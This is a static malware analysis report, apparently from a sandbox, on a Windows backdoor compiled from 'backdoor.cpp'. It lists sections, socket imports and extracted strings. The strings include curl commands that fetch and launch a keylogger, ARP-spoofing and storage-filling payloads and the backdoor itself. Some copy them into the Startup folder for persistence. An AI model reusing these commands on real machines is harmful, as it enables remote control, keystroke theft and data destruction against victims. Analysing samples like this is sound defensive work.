Static | ZeroBOX

PE Compile Time

2021-08-07 14:32:40

PE Imphash

8e93afb33c433eede3fd358369a7f47e

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00004328 0x00004400 6.09481058298
.data 0x00006000 0x0000001c 0x00000200 0.222389470473
.rdata 0x00007000 0x000025ec 0x00002600 5.33588486086
/4 0x0000a000 0x00000cb4 0x00000e00 4.58911058446
.bss 0x0000b000 0x00000078 0x00000000 0.0
.idata 0x0000c000 0x00000e48 0x00001000 4.78198554576
.CRT 0x0000d000 0x00000018 0x00000200 0.114463381259
.tls 0x0000e000 0x00000020 0x00000200 0.217769955458
/14 0x0000f000 0x00000038 0x00000200 0.21620690744
/29 0x00010000 0x00001cff 0x00001e00 5.76472518331
/41 0x00012000 0x0000012f 0x00000200 3.04408429956
/55 0x00013000 0x000001c8 0x00000200 4.30791686381
/67 0x00014000 0x00000038 0x00000200 0.678482794849

Imports

Library KERNEL32.dll:
0x40c25c AllocConsole
0x40c268 ExitProcess
0x40c26c FindClose
0x40c270 FindFirstFileA
0x40c274 FindNextFileA
0x40c278 FreeLibrary
0x40c27c GetCommandLineA
0x40c280 GetLastError
0x40c284 GetModuleHandleA
0x40c288 GetProcAddress
0x40c28c GetStartupInfoA
0x40c298 LoadLibraryA
0x40c2a0 Sleep
0x40c2a4 TlsGetValue
0x40c2a8 VirtualProtect
0x40c2ac VirtualQuery
Library msvcrt.dll:
0x40c2b4 _chdir
0x40c2b8 _strdup
0x40c2bc _stricoll
Library msvcrt.dll:
0x40c2c4 __getmainargs
0x40c2c8 __mb_cur_max
0x40c2cc __p__environ
0x40c2d0 __p__fmode
0x40c2d4 __set_app_type
0x40c2d8 _cexit
0x40c2dc _errno
0x40c2e0 _fpreset
0x40c2e4 _fullpath
0x40c2e8 _iob
0x40c2ec _isctype
0x40c2f0 _onexit
0x40c2f4 _pclose
0x40c2f8 _pctype
0x40c2fc _popen
0x40c300 _setmode
0x40c304 abort
0x40c308 atexit
0x40c30c calloc
0x40c310 exit
0x40c314 fgets
0x40c318 free
0x40c31c fwrite
0x40c320 malloc
0x40c324 mbstowcs
0x40c328 memcmp
0x40c32c memcpy
0x40c330 memset
0x40c334 printf
0x40c338 puts
0x40c33c realloc
0x40c340 setlocale
0x40c344 signal
0x40c348 strcat
0x40c34c strcmp
0x40c350 strcoll
0x40c354 strcpy
0x40c358 strlen
0x40c35c strncmp
0x40c360 strncpy
0x40c364 strtok
0x40c368 tolower
0x40c36c vfprintf
0x40c370 wcstombs
Library USER32.dll:
0x40c378 FindWindowA
0x40c37c ShowWindow
Library WSOCK32.DLL:
0x40c384 WSACleanup
0x40c388 WSAStartup
0x40c38c closesocket
0x40c390 connect
0x40c394 htons
0x40c398 inet_addr
0x40c39c recv
0x40c3a0 send
0x40c3a4 socket
Library libgcc_s_dw2-1.dll:
0x40c3ac _Unwind_Resume
0x40c3b8 __udivdi3

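Strings

(Printable strings recovered from the sample, reproduced exactly as they appear in the binary.)

!This program cannot be run in DOS mode.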
P`.data
.rdata
0@.bss
.idata
t(<{t?
</t&<\t"
libgcc_s_dw2-1.dll
__register_frame_info
__deregister_frame_info
libgcj-16.dll
_Jv_RegisterClasses
ConsoleWindowClass
Try to connection
[+] - Connected ^_^
[CMD] -
[ERR] - Error in recv() ! . Quitting
[ERR] - Server disconnected
download
apps_list
echo [APPLIST] [INFO] - This command allows you to view all the applications installed on the victim's device as well as those that are currently running
powershell -Command "Get-Process | Format-Table Handles,NPM,PM,WS,CPU,Id,SI,ProcessName,Name,Mainwindowtitle -AutoSize"
powershell -Command "Get-Process | Where-Object { $_.MainWindowTitle } | Format-Table Handles,NPM,PM,WS,CPU,Id,SI,ProcessName,Name,Mainwindowtitle -AutoSize"
powershell -Command "Get-AppxPackage"
startup
keylog
echo [EXT] [INFO] - This extension is built in C++ language and it logs all mouse and keyboard events and makes them available in C:\ProgramData\Ms\log.txt file. And the keylogger.exe file is in C:\ProgramData\Ms All events will be added to the file cumulatively, you can delete it if you want to re-registration, or you can use the following command: $ ext reset keylog
&& echo. && echo [ $ ] - Available Commands :
&& echo [ $ ext run keylog ] - for start recording
&& echo [ $ ext info keylog ] - show some info for keylog extension
&& echo [ $ ext reset keylog ] - delete keylog file : C:\ProgramData\Ms\log.txt
fill_storage
echo [EXT] [INFO] - This extension is built in betch, This add-on fills the device with large files and is created very quickly so that the storage capacity of the device can be filled in three seconds, and you can also make it more dangerous by copying the file fill_storage_move.bat to C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup . So that it works automatically when you startup the device
&& echo [ $ ext run fill_storage ] - for start fill storage
&& echo [ $ ext startup fill_storage ] - copying the file fill_storage_move.bat to C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
&& echo [ $ ext info fill_storage ] - show some info for fill_storage extension
&& echo [ $ ext run nmap ] - for download & make it ready for run
&& echo [ $ C:\ProgramData\Ms\Nmap\nmap ] - for start nmap
&& echo [ $ ext info nmap ] - show some info for nmap extension
arp_spoof
&& echo [ $ ext run arp_spoof ] - for download and make it ready for run
&& echo [ $ C:\ProgramData\Ms\arp_spoof\arp_spoof.py ] - for start arp_spoof
&& echo [ $ ext info arp_spoof ] - show some info for arp_spoof extension
echo [EXT] [INFO] - The extensions are based on multiple languages and different functions that achieve what the hacker wants to control the victim's device in a simple and fast way && echo Available extensions : && echo -- keylog && echo -- fill_storage && echo -- networks_profile && echo -- nmap && echo -- arp_spoof
IF NOT EXIST C:\ProgramData ( mkdir C:\ProgramData ) ELSE ( echo; ) && IF NOT EXIST C:\ProgramData\Ms ( mkdir C:\ProgramData\Ms ) ELSE ( echo; )
&& echo. && echo [EXT] [DOWNLOAD] - keylogextension in C:\ProgramData\Ms\keylogger.exe && echo [EXT] [RUN] - keylog extension .. && echo.
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/keylogger.exe -o C:\ProgramData\Ms\keylogger.exe && IF EXIST C:\ProgramData\Ms\keylogger.exe ( start C:\ProgramData\Ms\keylogger.exe ) ELSE ( echo; )
&& echo. && echo [EXT] [DOWNLOAD] - Nmap extension in C:\ProgramData\Ms\Nmap && echo [EXT] [RUN] - C:\ProgramData\Ms\Nmap\nmap && echo.
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/Nmap.zip -o C:\ProgramData\Ms\Nmap.zip && IF EXIST C:\ProgramData\Ms\Nmap.zip ( powershell -Command "Expand-Archive -Path "C:\ProgramData\Ms\Nmap.zip" -DestinationPath "C:\ProgramData\Ms"" ) ELSE ( echo; )
&& echo. && echo [EXT] [DOWNLOAD] - arp_spoof extension in C:\ProgramData\Ms\arp_spoof && echo [EXT] [RUN] - C:\ProgramData\Ms\arp_spoof\arp_spoof.py && echo.
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/arp_spoof.zip -o C:\ProgramData\Ms\arp_spoof.zip && IF EXIST C:\ProgramData\Ms\arp_spoof.zip ( powershell -Command "Expand-Archive -Path "C:\ProgramData\Ms\arp_spoof.zip" -DestinationPath "C:\ProgramData\Ms"" ) ELSE ( echo; )
networks_profile
&& echo. && echo [EXT] [DOWNLOAD] - networks_profile extension in C:\ProgramData\Ms\networks_profile.exe && echo [EXT] [RUN] - networks_profile extension .. && echo.
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/networks_profile.exe -o C:\ProgramData\Ms\networks_profile.exe && IF EXIST C:\ProgramData\Ms\networks_profile.exe ( start C:\ProgramData\Ms\networks_profile.exe ) ELSE ( echo; )
&& echo [EXT] [DOWNLOAD] - fill_storage [ move.bat, virus.bat ] extension in C:\ProgramData\Ms && echo [EXT] [RUN] - fill_storage extension .. && echo.
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/fill_storage_move.bat -o C:\ProgramData\Ms\fill_storage_move.bat && curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/fill_storage_virus.bat -o C:\ProgramData\Ms\fill_storage_virus.bat && IF EXIST C:\ProgramData\Ms\fill_storage_move.bat ( start C:\ProgramData\Ms\fill_storage_move.bat ) ELSE ( echo; )
test_virus
&& echo [EXT] [DOWNLOAD] - test [ move.bat, virus.bat ] extension in C:\ProgramData\Ms && echo [EXT] [RUN] - test_virus extension .. && echo.
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/test_move.bat -o C:\ProgramData\Ms\test_move.bat && curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/test_virus.bat -o C:\ProgramData\Ms\test_virus.bat
&& IF EXIST C:\ProgramData\Ms\test_move.bat ( start C:\ProgramData\Ms\test_move.bat ) ELSE ( echo; )
echo [EXT] [ERR] - You must use a valid extension name !
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/keylogger.exe -o "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\keylogger.exe"
&& IF EXIST "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\keylogger.exe" ( start "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\keylogger.exe" ) ELSE ( echo; )
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/fill_storage_move.bat -o "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fill_storage_move.bat" && curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/fill_storage_virus.bat -o "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fill_storage_virus.bat"
&& IF EXIST "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fill_storage_move.bat" ( start "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fill_storage_move.bat" ) ELSE ( echo; )
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/test_move.bat -o "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\test_move.bat" && curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/extensions/test_virus.bat -o "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\test_virus.bat"
&& IF EXIST "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\test.bat" ( start "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\test_move.bat" ) ELSE ( echo; )
&& curl -H "Accept: application/vnd.github.v3+json" https://raw.githubusercontent.com/s3q/blackdoor/main/backdoor.exe -o "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.exe"
powershell -Command "Stop-Process -Name "keylogger"" && powershell -Command "Get-Process | Where-Object {$_.Path -like "C:\ProgramData\Ms\keylogger.exe"} | Stop-Process -WhatIf"
powershell -Command "Stop-Process -Name "fill_storage_virus"" && powershell -Command "Get-Process | Where-Object {$_.Path -like "C:\ProgramData\Ms\fill_storage_virus.bat"} | Stop-Process -WhatIf"
powershell -Command "Stop-Process -Name "arp_spoof"" && powershell -Command "Get-Process | Where-Object {$_.Path -like "C:\ProgramData\Ms\arp_spoof.exe"} | Stop-Process -WhatIf"
%s --- %s
Mingw runtime failure:
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
glob-1.0-mingw32
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (MinGW.org GCC-6.3.0-1) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
GCC: (GNU) 6.3.0
AllocConsole
DeleteCriticalSection
EnterCriticalSection
ExitProcess
FindClose
FindFirstFileA
FindNextFileA
FreeLibrary
GetCommandLineA
GetLastError
GetModuleHandleA
GetProcAddress
GetStartupInfoA
InitializeCriticalSection
LeaveCriticalSection
LoadLibraryA
SetUnhandledExceptionFilter
TlsGetValue
VirtualProtect
VirtualQuery
_chdir
_strdup
_stricoll
__getmainargs
__mb_cur_max
__p__environ
__p__fmode
__set_app_type
_cexit
_errno
_fpreset
_fullpath
_isctype
_onexit
_pclose
_pctype
_popen
_setmode
atexit
calloc
fwrite
malloc
mbstowcs
memcmp
memcpy
memset
printf
realloc
setlocale
signal
strcat
strcmp
strcoll
strcpy
strlen
strncmp
strncpy
strtok
tolower
vfprintf
wcstombs
FindWindowA
ShowWindow
WSACleanup
WSAStartup
closesocket
connect
inet_addr
socket
_Unwind_Resume
__deregister_frame_info
__register_frame_info
__udivdi3
_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4dataEv
_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4findEPKcj
_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE4sizeEv
_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE5c_strEv
_ZNSaIcEC1Ev
_ZNSaIcED1Ev
_ZNSolsEPFRSoS_E
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1EPKcRKS3_
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1ERKS4_
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSEOS4_
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSEPKc
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSERKS4_
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc
_ZNSt8ios_base4InitC1Ev
_ZNSt8ios_base4InitD1Ev
_ZSt4cerr
_ZSt4cout
_ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_
_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc
__gxx_personality_v0
KERNEL32.dll
msvcrt.dll
msvcrt.dll
USER32.dll
WSOCK32.DLL
libgcc_s_dw2-1.dll
libstdc++-6.dll
../../../src/gcc-6.3.0/libgcc/config/i386/cygwin.S
/home/keith/src/mingw/gcc-build/gcc-6.3.0-mingw32-cross-native/mingw32/libgcc
GNU AS 2.28
GNU C11 6.3.0 -mtune=generic -march=i586 -g -g -g -O2 -O2 -O2 -fbuilding-libgcc -fno-stack-protector
../../../src/gcc-6.3.0/libgcc/libgcc2.c
/home/keith/src/mingw/gcc-build/gcc-6.3.0-mingw32-cross-native/mingw32/libgcc
unsigned int
short unsigned int
long long int
long double
long int
_iobuf
_charbuf
_bufsiz
_tmpfname
short int
long unsigned int
__mb_cur_max
_sys_nerr
_sys_errlist
_osver
_winver
_winmajor
_winminor
_fmode
sizetype
optind
optopt
opterr
optarg
_daylight
_timezone
_tzname
daylight
timezone
tzname
hashval_t
htab_hash
htab_eq
htab_hash_pointer
htab_eq_pointer
unsigned char
stringop_alg
no_stringop
libcall
rep_prefix_1_byte
rep_prefix_4_byte
rep_prefix_8_byte
loop_1_byte
unrolled_loop
vector_loop
last_alg
unspec_strings
unspecv_strings
stringop_strategy
noalign
stringop_algs
unknown_size
processor_costs
shift_var
shift_const
mult_init
mult_bit
divide
large_insn
move_ratio
movzbl_load
int_load
int_store
fp_move
fp_load
fp_store
mmx_move
mmx_load
mmx_store
sse_move
sse_load
sse_store
mmxsse_to_integer
l1_cache_size
l2_cache_size
prefetch_block
simultaneous_prefetches
branch_cost
memcpy
memset
scalar_stmt_cost
scalar_load_cost
scalar_store_cost
vec_stmt_cost
vec_to_scalar_cost
scalar_to_vec_cost
vec_align_load_cost
vec_unalign_load_cost
vec_store_cost
cond_taken_branch_cost
cond_not_taken_branch_cost
ix86_cost
ix86_size_cost
ix86_tune_indices
X86_TUNE_SCHEDULE
X86_TUNE_PARTIAL_REG_DEPENDENCY
X86_TUNE_SSE_PARTIAL_REG_DEPENDENCY
X86_TUNE_SSE_SPLIT_REGS
X86_TUNE_PARTIAL_FLAG_REG_STALL
X86_TUNE_MOVX
X86_TUNE_MEMORY_MISMATCH_STALL
X86_TUNE_FUSE_CMP_AND_BRANCH_32
X86_TUNE_FUSE_CMP_AND_BRANCH_64
X86_TUNE_FUSE_CMP_AND_BRANCH_SOFLAGS
X86_TUNE_FUSE_ALU_AND_BRANCH
X86_TUNE_REASSOC_INT_TO_PARALLEL
X86_TUNE_REASSOC_FP_TO_PARALLEL
X86_TUNE_ACCUMULATE_OUTGOING_ARGS
X86_TUNE_PROLOGUE_USING_MOVE
X86_TUNE_EPILOGUE_USING_MOVE
X86_TUNE_USE_LEAVE
X86_TUNE_PUSH_MEMORY
X86_TUNE_SINGLE_PUSH
X86_TUNE_DOUBLE_PUSH
X86_TUNE_SINGLE_POP
X86_TUNE_DOUBLE_POP
X86_TUNE_PAD_SHORT_FUNCTION
X86_TUNE_PAD_RETURNS
X86_TUNE_FOUR_JUMP_LIMIT
X86_TUNE_SOFTWARE_PREFETCHING_BENEFICIAL
X86_TUNE_LCP_STALL
X86_TUNE_READ_MODIFY
X86_TUNE_USE_INCDEC
X86_TUNE_INTEGER_DFMODE_MOVES
X86_TUNE_OPT_AGU
X86_TUNE_AVOID_LEA_FOR_ADDR
X86_TUNE_SLOW_IMUL_IMM32_MEM
X86_TUNE_SLOW_IMUL_IMM8
X86_TUNE_AVOID_MEM_OPND_FOR_CMOVE
X86_TUNE_SINGLE_STRINGOP
X86_TUNE_MISALIGNED_MOVE_STRING_PRO_EPILOGUES
X86_TUNE_USE_SAHF
X86_TUNE_USE_CLTD
X86_TUNE_USE_BT
X86_TUNE_USE_HIMODE_FIOP
X86_TUNE_USE_SIMODE_FIOP
X86_TUNE_USE_FFREEP
X86_TUNE_EXT_80387_CONSTANTS
X86_TUNE_VECTORIZE_DOUBLE
X86_TUNE_GENERAL_REGS_SSE_SPILL
X86_TUNE_SSE_UNALIGNED_LOAD_OPTIMAL
X86_TUNE_SSE_UNALIGNED_STORE_OPTIMAL
X86_TUNE_SSE_PACKED_SINGLE_INSN_OPTIMAL
X86_TUNE_SSE_TYPELESS_STORES
X86_TUNE_SSE_LOAD0_BY_PXOR
X86_TUNE_INTER_UNIT_MOVES_TO_VEC
X86_TUNE_INTER_UNIT_MOVES_FROM_VEC
X86_TUNE_INTER_UNIT_CONVERSIONS
X86_TUNE_SPLIT_MEM_OPND_FOR_FP_CONVERTS
X86_TUNE_USE_VECTOR_FP_CONVERTS
X86_TUNE_USE_VECTOR_CONVERTS
X86_TUNE_SLOW_PSHUFB
X86_TUNE_VECTOR_PARALLEL_EXECUTION
X86_TUNE_AVOID_4BYTE_PREFIXES
X86_TUNE_AVX256_UNALIGNED_LOAD_OPTIMAL
X86_TUNE_AVX256_UNALIGNED_STORE_OPTIMAL
X86_TUNE_AVX128_OPTIMAL
X86_TUNE_DOUBLE_WITH_ADD
X86_TUNE_ALWAYS_FANCY_MATH_387
X86_TUNE_UNROLL_STRLEN
X86_TUNE_SHIFT1
X86_TUNE_ZERO_EXTEND_WITH_AND
X86_TUNE_PROMOTE_HIMODE_IMUL
X86_TUNE_FAST_PREFIX
X86_TUNE_READ_MODIFY_WRITE
X86_TUNE_MOVE_M1_VIA_OR
X86_TUNE_NOT_UNPAIRABLE
X86_TUNE_PARTIAL_REG_STALL
X86_TUNE_PROMOTE_QIMODE
X86_TUNE_PROMOTE_HI_REGS
X86_TUNE_HIMODE_MATH
X86_TUNE_SPLIT_LONG_MOVES
X86_TUNE_USE_XCHGB
X86_TUNE_USE_MOV0
X86_TUNE_NOT_VECTORMODE
X86_TUNE_AVOID_VECTOR_DECODE
X86_TUNE_AVOID_FALSE_DEP_FOR_BMI
X86_TUNE_BRANCH_PREDICTION_HINTS
X86_TUNE_QIMODE_MATH
X86_TUNE_PROMOTE_QI_REGS
X86_TUNE_ADJUST_UNROLL
X86_TUNE_ONE_IF_CONV_INSN
X86_TUNE_LAST
ix86_tune_features
ix86_arch_indices
X86_ARCH_CMOV
X86_ARCH_CMPXCHG
X86_ARCH_CMPXCHG8B
X86_ARCH_XADD
X86_ARCH_BSWAP
X86_ARCH_LAST
ix86_arch_features
x86_prefetch_sse
_dont_use_tree_here_
x86_mfence
reg_class
NO_REGS
AD_REGS
CLOBBERED_REGS
Q_REGS
NON_Q_REGS
INDEX_REGS
LEGACY_REGS
GENERAL_REGS
FP_TOP_REG
FP_SECOND_REG
FLOAT_REGS
SSE_FIRST_REG
NO_REX_SSE_REGS
SSE_REGS
EVEX_SSE_REGS
BND_REGS
ALL_SSE_REGS
MMX_REGS
FP_TOP_SSE_REGS
FP_SECOND_SSE_REGS
FLOAT_SSE_REGS
FLOAT_INT_REGS
INT_SSE_REGS
FLOAT_INT_SSE_REGS
MASK_EVEX_REGS
MASK_REGS
ALL_REGS
LIM_REG_CLASSES
dbx_register_map
dbx64_register_map
svr4_dbx_register_map
x86_64_ms_sysv_extra_clobbered_registers
processor_type
PROCESSOR_GENERIC
PROCESSOR_I386
PROCESSOR_I486
PROCESSOR_PENTIUM
PROCESSOR_LAKEMONT
PROCESSOR_PENTIUMPRO
PROCESSOR_PENTIUM4
PROCESSOR_NOCONA
PROCESSOR_CORE2
PROCESSOR_NEHALEM
PROCESSOR_SANDYBRIDGE
PROCESSOR_HASWELL
PROCESSOR_BONNELL
PROCESSOR_SILVERMONT
PROCESSOR_KNL
PROCESSOR_SKYLAKE_AVX512
PROCESSOR_INTEL
PROCESSOR_GEODE
PROCESSOR_K6
PROCESSOR_ATHLON
PROCESSOR_K8
PROCESSOR_AMDFAM10
PROCESSOR_BDVER1
PROCESSOR_BDVER2
PROCESSOR_BDVER3
PROCESSOR_BDVER4
PROCESSOR_BTVER1
PROCESSOR_BTVER2
PROCESSOR_ZNVER1
PROCESSOR_max
ix86_tune
ix86_arch
ix86_preferred_stack_boundary
ix86_incoming_stack_boundary
regclass_map
signed char
UQItype
long long unsigned int
complex float
double
complex double
complex long double
__float128
__unknown__
__popcount_tab
__clz_tab
func_ptr
__CTOR_LIST__
__DTOR_LIST__
../../../src/gcc-6.3.0/libgcc/config/i386
cygwin.S
""YK0g=YY0/>""
/home/keith/mingw32-gcc-6.3.0/include
../../../src/gcc-6.3.0/libgcc/../include
../.././gcc
../../../src/gcc-6.3.0/libgcc/../gcc/config/i386
../../../src/gcc-6.3.0/libgcc
stdio.h
stdlib.h
getopt.h
time.h
hashtab.h
insn-constants.h
i386.h
i386-opts.h
libgcc2.h
gbl-ctors.h
libgcc2.c
_atexit
__onexit0
cygming-crtbegin.c_obj
.rdata
backdoor.cpp
___tcf_0
.rdata
.ctors
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$4
.idata$5
.idata$74
.idata$5
.idata$4T
.idata$6,
@feat.00
.idata$70
.idata$5
.idata$4P
.idata$6
@feat.00
.idata$7,
.idata$5
.idata$4L
.idata$6
@feat.00
.idata$7(
.idata$5
.idata$4H
.idata$6
.idata$7$
.idata$5
.idata$4D
.idata$6
.idata$7
.idata$5
.idata$4@
.idata$6|
@feat.00
.idata$7
.idata$5
.idata$4<
.idata$6`
@feat.00
.idata$7
.idata$5
.idata$48
.idata$6
@feat.00
.idata$7
.idata$5
.idata$44
.idata$6
@feat.00
.idata$7
.idata$5
.idata$40
.idata$6
@feat.00
.idata$7
.idata$5
.idata$4,
.idata$6`
@feat.00
.idata$7
.idata$5
.idata$4(
.idata$6$
@feat.00
.idata$7
.idata$5
.idata$4$
.idata$6
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6|
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6l
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6(
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6d
@feat.00
___main
.CRT$XDZ
.CRT$XDA
.CRT$XLA
.tls$ZZZ
.tls$AAA
.rdata
.idata$7
.idata$5
.idata$4
.idata$6@
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6$
@feat.00
.idata$7
.idata$5
.idata$4
.idata$6
@feat.00
libgcc2.c
.idata$5
.idata$6
.idata$4
.idata$5
.rdata
.rdata
_sleep
.idata$5p
.idata$6
.idata$5l
.idata$6x
.idata$5h
.idata$6n
.idata$5d
.idata$6d
.idata$5`
.idata$6Z
.idata$5\
.idata$6P
.idata$5X
.idata$6F
.idata$5T
.idata$6<
.idata$5P
.idata$62
.idata$5L
.idata$6(
.idata$5H
.idata$6
.idata$5D
.idata$6
.idata$5@
.idata$6
.idata$5<
.idata$6
.idata$58
.idata$6
.idata$54
.idata$6
.idata$50
.idata$6
.idata$5,
.idata$6
.idata$5(
.idata$6
.idata$5$
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$6
.idata$5
.idata$6z
.idata$5
.idata$6n
.idata$5
.idata$6d
.idata$6Z
.idata$5
.idata$6P
.idata$6F
.idata$5
.idata$6:
.idata$62
.idata$5
.idata$6&
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$6
.idata$5
.idata$6
.idata$4
.idata$5
.idata$5|
.idata$6
.idata$5x
.idata$6
.idata$4
.idata$5x
.idata$5
.idata$6
.idata$5
.idata$6t
.idata$5
.idata$6f
.idata$5
.idata$6@
.idata$5
.idata$60
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5|
.idata$6
.idata$5x
.idata$6
.idata$5t
.idata$6
.idata$5p
.idata$6r
.idata$5l
.idata$6f
.idata$5h
.idata$6X
.idata$5d
.idata$6@
.idata$5`
.idata$6(
.idata$5\
.idata$6
.idata$4
.idata$5\
.idata$7
.idata$5
.idata$4
.idata$6X
@feat.00
.idata$5
.idata$6
.idata$5
.idata$6
cygming-crtend.c
.idata$5
.idata$6
.idata$5
.idata$6
.idata$5
.idata$6^
.rdata
.idata$2d
.idata$5
.idata$4
.idata$2x
.idata$5
.idata$4
.idata$4
.idata$5
.idata$7
.idata$4X
.idata$5
.idata$78
__cexit
_strcat
_strcmp
__errno
_recv@16p
___xl_c
___xl_z
__popen
_strcoll0?
__dll__
_fwrite
_strncpy
_memcpy
_memset
__argc
_chdir
_tolower
___xl_a
___xl_d
__CRT_MTl
_send@16h
_strdup
__argv
_calloc
__fmode
_reallocX?
__end__
_signal
_malloc
_strcpy
_memcmp
__pclose
_strtok
_abort
_strncmp
_htons@4
_fgets
_strlen
_printf
_Sleep@4
.eh_frame
.debug_aranges
.debug_info
.debug_abbrev
.debug_line
.debug_frame
__mingw32_init_mainargs
_mainCRTStartup
_WinMainCRTStartup
_deregister_frame_fn
___JCR_LIST__
___gcc_register_frame
___gcc_deregister_frame
.eh_frame
.rdata$zzz
__ZStL19piecewise_construct
.text$_ZNSt11char_traitsIcE7compareEPKcS2_j
__ZNSt11char_traitsIcE7compareEPKcS2_j
.text$feof
__ZStL8__ioinit
_WinMain@16
__Z9AdditionsB5cxx11Pc
__Z10CE_InfoExtNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE
__Z9CE_RunExtNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE
__Z13CE_StartupExtNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE
__Z10CE_StopExtNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE
__Z11strincludesPcS_
__Z6strsubPcii
.text$_ZSteqIcEN9__gnu_cxx11__enable_ifIXsrSt9__is_charIT_E7__valueEbE6__typeERKNSt7__cxx1112basic_stringIS3_St11char_traitsIS3_ESaIS3_EEESE_
__ZSteqIcEN9__gnu_cxx11__enable_ifIXsrSt9__is_charIT_E7__valueEbE6__typeERKNSt7__cxx1112basic_stringIS3_St11char_traitsIS3_ESaIS3_EEESE_
__Z41__static_initialization_and_destruction_0ii
__GLOBAL__sub_I_sock
.gcc_except_table
.eh_frame$_ZNSt11char_traitsIcE7compareEPKcS2_j
.eh_frame$feof
